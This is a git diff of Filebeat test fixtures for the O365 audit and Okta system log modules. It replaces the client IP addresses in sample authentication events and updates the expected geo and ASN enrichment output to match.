diff --git a/x-pack/filebeat/module/o365/audit/test/str-params.log-expected.json b/x-pack/filebeat/module/o365/audit/test/str-params.log-expected.json index 764d9283acfd..6f1d4a83b54e 100644 --- a/x-pack/filebeat/module/o365/audit/test/str-params.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/str-params.log-expected.json @@ -45,8 +45,8 @@ }, { "@timestamp": "2021-02-05T09:06:07.000Z", - "client.address": "79.159.11.115", - "client.ip": "79.159.11.115", + "client.address": "89.160.20.112", + "client.ip": "89.160.20.112", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -77,10 +77,10 @@ } ], "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e", - "o365.audit.ActorIpAddress": "79.159.11.115", + "o365.audit.ActorIpAddress": "89.160.20.112", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "79.159.11.115", + "o365.audit.ClientIP": "89.160.20.112", "o365.audit.CreationTime": "2021-02-05T09:06:07", "o365.audit.ErrorNumber": "0", "o365.audit.ExtendedProperties._raw": "-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"", 
@@ -106,20 +106,20 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", - "related.ip": "79.159.11.115", + "related.ip": "89.160.20.112", "related.user": "root", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.11.115", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.112", "tags": [ "forwarded" ], diff --git a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log index b21d1eca1e16..6c4aa40edfc8 100644 --- a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log +++ b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log 
@@ -1,5 +1,5 @@ -{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102nZHzd6OHSfGG51vsoc22gw","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"108.255.197.247","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"authnRequestId":"XkcAsWb8WjwDP76xh@1v8wAABp0","requestId":"XkccyyMli2Uay2I93ZgRzQAAB0c","requestUri":"/login/signout","threatSuspected":"false","url":"/login/signout?message=login_page_messages.session_has_expired"}},"displayMessage":"User logout from Okta","eventType":"user.session.end","legacyEventType":"core.user_auth.logout_success","outcome":{"reason":null,"result":"SUCCESS"},"published":"2020-02-14T22:18:51.843Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"108.255.197.247","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":null,"transaction":{"detail":{},"id":"XkccyyMli2Uay2I93ZgRzQAAB0c","type":"WEB"},"uuid":"faf7398a-4f77-11ea-97fb-5925e98228bd","version":"0"} 
-{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"108.255.197.247","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"deviceFingerprint":"541daf91d15bef64a7e08c946fd9a9d0","requestId":"XkcAsWb8WjwDP76xh@1v8wAABp0","requestUri":"/api/v1/authn","threatSuspected":"false","url":"/api/v1/authn?"}},"displayMessage":"User login to Okta","eventType":"user.session.start","legacyEventType":"core.user_auth.login_success","outcome":{"reason":null,"result":"SUCCESS"},"published":"2020-02-14T20:18:57.718Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"108.255.197.247","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":null,"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"3aeede38-4f67-11ea-abd3-1f5d113f2546","version":"0"} 
-{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"108.255.197.247","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"deviceFingerprint":"541daf91d15bef64a7e08c946fd9a9d0","requestId":"XkcAsWb8WjwDP76xh@1v8wAABp0","requestUri":"/api/v1/authn","threatSuspected":"false","url":"/api/v1/authn?"}},"displayMessage":"Evaluation of sign-on policy","eventType":"policy.evaluate_sign_on","legacyEventType":null,"outcome":{"reason":"Sign-on policy evaluation resulted in ALLOW","result":"ALLOW"},"published":"2020-02-14T20:18:57.762Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"108.255.197.247","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":[{"alternateId":"unknown","detailEntry":{"policyType":"OktaSignOn"},"displayName":"Default Policy","id":"00p1abvweGGDW10Ur4x6","type":"PolicyEntity"},{"alternateId":"00p1abvweGGDW10Ur4x6","detailEntry":null,"displayName":"Default Rule","id":"0pr1abvwfqGFI4n064x6","type":"PolicyRule"}],"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"3af594f9-4f67-11ea-abd3-1f5d113f2546","version":"0"} 
-{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"108.255.197.247","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"deviceFingerprint":"541daf91d15bef64a7e08c946fd9a9d0","requestId":"","requestUri":"","threatSuspected":"false","url":"","suspiciousActivityBrowser":"browser","suspiciousActivityEventCity":"New York City","suspiciousActivityEventCountry":"United Sates","suspiciousActivityEventId":"1234567","suspiciousActivityEventIp":"10.50.14.5","suspiciousActivityEventLatitude":"40.744960","suspiciousActivityEventLongitude":"-73.988590","suspiciousActivityEventState":"New York","suspiciousActivityEventTransactionId":"12345678900","suspiciousActivityEventType":"system.email.new_device_notification.sent_message","suspiciousActivityOs":"Windows 10","suspiciousActivityTimestamp":"2021-05-08T21:50:16.594Z"}},"displayMessage":"Evaluation of sign-on policy","eventType":"policy.evaluate_sign_on","legacyEventType":null,"outcome":{"reason":"Sign-on policy evaluation resulted in ALLOW","result":"ALLOW"},"published":"2020-02-14T20:18:57.762Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United 
States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"108.255.197.247","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":[{"alternateId":"unknown","detailEntry":{"policyType":"OktaSignOn"},"displayName":"Default Policy","id":"00p1abvweGGDW10Ur4x6","type":"PolicyEntity"},{"alternateId":"00p1abvweGGDW10Ur4x6","detailEntry":null,"displayName":"Default Rule","id":"0pr1abvwfqGFI4n064x6","type":"PolicyRule"}],"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"36a3b6b3-fcc0-47a0-96bd-95330cfdb658","version":"0"} -{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"108.255.197.247","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"requestId":"","requestUri":"","suspiciousActivityBrowser":"browser","suspiciousActivityEventCity":"New York City","suspiciousActivityEventCountry":"United States","suspiciousActivityEventId":"1234567","suspiciousActivityEventIp":"10.50.14.5","suspiciousActivityEventLatitude":"40.744960","suspiciousActivityEventLongitude":"-73.988590","suspiciousActivityEventState":"New York","suspiciousActivityEventTransactionId":"12345678900","suspiciousActivityEventType":"system.email.new_device_notification.sent_message","suspiciousActivityOs":"Windows 
10","suspiciousActivityTimestamp":"2021-05-08T21:50:16.594Z","url":""}},"device":null,"displayMessage":"User report suspicious activity","eventType":"user.account.report_suspicious_activity_by_enduser","legacyEventType":"core.user.account.report_suspicious_activity_by_enduser","outcome":{"reason":null,"result":"SUCCESS"},"published":"2020-02-14T20:18:57.762Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"108.255.197.247","source":null,"version":"V4"}]},"securityContext":{"asNumber":7018,"asOrg":"AT&T Services, Inc.","domain":"att.com","isProxy":false,"isp":"AT&T Corp."},"severity":"WARN","target":[{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"}],"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"c2adb364-88d1-45a9-a620-2b64e44c5fcf","version":"0"} +{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102nZHzd6OHSfGG51vsoc22gw","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"67.43.156.12","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"authnRequestId":"XkcAsWb8WjwDP76xh@1v8wAABp0","requestId":"XkccyyMli2Uay2I93ZgRzQAAB0c","requestUri":"/login/signout","threatSuspected":"false","url":"/login/signout?message=login_page_messages.session_has_expired"}},"displayMessage":"User logout 
from Okta","eventType":"user.session.end","legacyEventType":"core.user_auth.logout_success","outcome":{"reason":null,"result":"SUCCESS"},"published":"2020-02-14T22:18:51.843Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"67.43.156.12","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":null,"transaction":{"detail":{},"id":"XkccyyMli2Uay2I93ZgRzQAAB0c","type":"WEB"},"uuid":"faf7398a-4f77-11ea-97fb-5925e98228bd","version":"0"} +{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"67.43.156.12","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"deviceFingerprint":"541daf91d15bef64a7e08c946fd9a9d0","requestId":"XkcAsWb8WjwDP76xh@1v8wAABp0","requestUri":"/api/v1/authn","threatSuspected":"false","url":"/api/v1/authn?"}},"displayMessage":"User login to Okta","eventType":"user.session.start","legacyEventType":"core.user_auth.login_success","outcome":{"reason":null,"result":"SUCCESS"},"published":"2020-02-14T20:18:57.718Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United 
States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"67.43.156.12","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":null,"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"3aeede38-4f67-11ea-abd3-1f5d113f2546","version":"0"} +{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"67.43.156.12","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"deviceFingerprint":"541daf91d15bef64a7e08c946fd9a9d0","requestId":"XkcAsWb8WjwDP76xh@1v8wAABp0","requestUri":"/api/v1/authn","threatSuspected":"false","url":"/api/v1/authn?"}},"displayMessage":"Evaluation of sign-on policy","eventType":"policy.evaluate_sign_on","legacyEventType":null,"outcome":{"reason":"Sign-on policy evaluation resulted in ALLOW","result":"ALLOW"},"published":"2020-02-14T20:18:57.762Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"67.43.156.12","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":[{"alternateId":"unknown","detailEntry":{"policyType":"OktaSignOn"},"displayName":"Default 
Policy","id":"00p1abvweGGDW10Ur4x6","type":"PolicyEntity"},{"alternateId":"00p1abvweGGDW10Ur4x6","detailEntry":null,"displayName":"Default Rule","id":"0pr1abvwfqGFI4n064x6","type":"PolicyRule"}],"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"3af594f9-4f67-11ea-abd3-1f5d113f2546","version":"0"} +{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"67.43.156.12","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"deviceFingerprint":"541daf91d15bef64a7e08c946fd9a9d0","requestId":"","requestUri":"","threatSuspected":"false","url":"","suspiciousActivityBrowser":"browser","suspiciousActivityEventCity":"New York City","suspiciousActivityEventCountry":"United Sates","suspiciousActivityEventId":"1234567","suspiciousActivityEventIp":"10.50.14.5","suspiciousActivityEventLatitude":"40.744960","suspiciousActivityEventLongitude":"-73.988590","suspiciousActivityEventState":"New York","suspiciousActivityEventTransactionId":"12345678900","suspiciousActivityEventType":"system.email.new_device_notification.sent_message","suspiciousActivityOs":"Windows 10","suspiciousActivityTimestamp":"2021-05-08T21:50:16.594Z"}},"displayMessage":"Evaluation of sign-on policy","eventType":"policy.evaluate_sign_on","legacyEventType":null,"outcome":{"reason":"Sign-on policy evaluation resulted in 
ALLOW","result":"ALLOW"},"published":"2020-02-14T20:18:57.762Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"67.43.156.12","source":null,"version":"V4"}]},"securityContext":{"asNumber":null,"asOrg":null,"domain":null,"isProxy":null,"isp":null},"severity":"INFO","target":[{"alternateId":"unknown","detailEntry":{"policyType":"OktaSignOn"},"displayName":"Default Policy","id":"00p1abvweGGDW10Ur4x6","type":"PolicyEntity"},{"alternateId":"00p1abvweGGDW10Ur4x6","detailEntry":null,"displayName":"Default Rule","id":"0pr1abvwfqGFI4n064x6","type":"PolicyRule"}],"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"36a3b6b3-fcc0-47a0-96bd-95330cfdb658","version":"0"} +{"actor":{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"},"authenticationContext":{"authenticationProvider":null,"authenticationStep":0,"credentialProvider":null,"credentialType":null,"externalSessionId":"102bZDNFfWaQSyEZQuDgWt-uQ","interface":null,"issuer":null},"client":{"device":"Computer","geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"id":null,"ipAddress":"67.43.156.12","userAgent":{"browser":"FIREFOX","os":"Mac OS X","rawUserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0"},"zone":"null"},"debugContext":{"debugData":{"requestId":"","requestUri":"","suspiciousActivityBrowser":"browser","suspiciousActivityEventCity":"New York City","suspiciousActivityEventCountry":"United States","suspiciousActivityEventId":"1234567","suspiciousActivityEventIp":"10.50.14.5","suspiciousActivityEventLatitude":"40.744960","suspiciousActivityEventLongitude":"-73.988590","suspiciousActivityEventState":"New 
York","suspiciousActivityEventTransactionId":"12345678900","suspiciousActivityEventType":"system.email.new_device_notification.sent_message","suspiciousActivityOs":"Windows 10","suspiciousActivityTimestamp":"2021-05-08T21:50:16.594Z","url":""}},"device":null,"displayMessage":"User report suspicious activity","eventType":"user.account.report_suspicious_activity_by_enduser","legacyEventType":"core.user.account.report_suspicious_activity_by_enduser","outcome":{"reason":null,"result":"SUCCESS"},"published":"2020-02-14T20:18:57.762Z","request":{"ipChain":[{"geographicalContext":{"city":"Dublin","country":"United States","geolocation":{"lat":37.7201,"lon":-121.919},"postalCode":"94568","state":"California"},"ip":"67.43.156.12","source":null,"version":"V4"}]},"securityContext":{"asNumber":7018,"asOrg":"AT&T Services, Inc.","domain":"att.com","isProxy":false,"isp":"AT&T Corp."},"severity":"WARN","target":[{"alternateId":"xxxxxx@elastic.co","detailEntry":null,"displayName":"xxxxxx","id":"00u1abvz4pYqdM8ms4x6","type":"User"}],"transaction":{"detail":{},"id":"XkcAsWb8WjwDP76xh@1v8wAABp0","type":"WEB"},"uuid":"c2adb364-88d1-45a9-a620-2b64e44c5fcf","version":"0"} diff --git a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json index e882c2b68cf5..794ed2c83cb1 100644 --- a/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json +++ b/x-pack/filebeat/module/okta/system/test/okta-system-test.json.log-expected.json @@ -6,7 +6,7 @@ "client.geo.location.lat": 37.7201, "client.geo.location.lon": -121.919, "client.geo.region_name": "California", - "client.ip": "108.255.197.247", + "client.ip": "67.43.156.12", "client.user.full_name": "xxxxxx", "client.user.id": "00u1abvz4pYqdM8ms4x6", "event.action": "user.session.end", 
@@ -18,7 +18,7 @@ "event.id": "faf7398a-4f77-11ea-97fb-5925e98228bd", "event.kind": "event", "event.module": "okta", - "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}", + "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"67.43.156.12\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"67.43.156.12\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}", "event.outcome": "success", "event.type": [ "end", @@ -34,7 +34,7 @@ "okta.authentication_context.authentication_step": 0, "okta.authentication_context.external_session_id": "102nZHzd6OHSfGG51vsoc22gw", "okta.client.device": "Computer", - "okta.client.ip": "108.255.197.247", + "okta.client.ip": "67.43.156.12", "okta.client.user_agent.browser": "FIREFOX", "okta.client.user_agent.os": "Mac OS X", "okta.client.user_agent.raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", @@ -50,23 +50,19 @@ "okta.transaction.type": "WEB", "okta.uuid": "faf7398a-4f77-11ea-97fb-5925e98228bd", "related.ip": [ - "108.255.197.247" + "67.43.156.12" ], "related.user": [ "xxxxxx" ], "service.type": "okta", - "source.as.number": 7018, - "source.as.organization.name": "AT&T Services, Inc.", - "source.geo.city_name": "Dublin", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 37.7201, - "source.geo.location.lon": -121.919, - "source.geo.region_iso_code": "US-CA", - "source.geo.region_name": "California", - "source.ip": "108.255.197.247", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "source.user.full_name": "xxxxxx", "source.user.id": "00u1abvz4pYqdM8ms4x6", "tags": [ 
@@ -91,7 +87,7 @@
 "client.geo.location.lat": 37.7201,
 "client.geo.location.lon": -121.919,
 "client.geo.region_name": "California",
- "client.ip": "108.255.197.247",
+ "client.ip": "67.43.156.12",
 "client.user.full_name": "xxxxxx",
 "client.user.id": "00u1abvz4pYqdM8ms4x6",
 "event.action": "user.session.start",
